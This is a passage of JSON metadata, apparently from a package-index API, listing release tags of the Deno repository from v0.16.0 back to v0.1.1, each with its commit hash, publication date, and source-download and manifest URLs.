0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.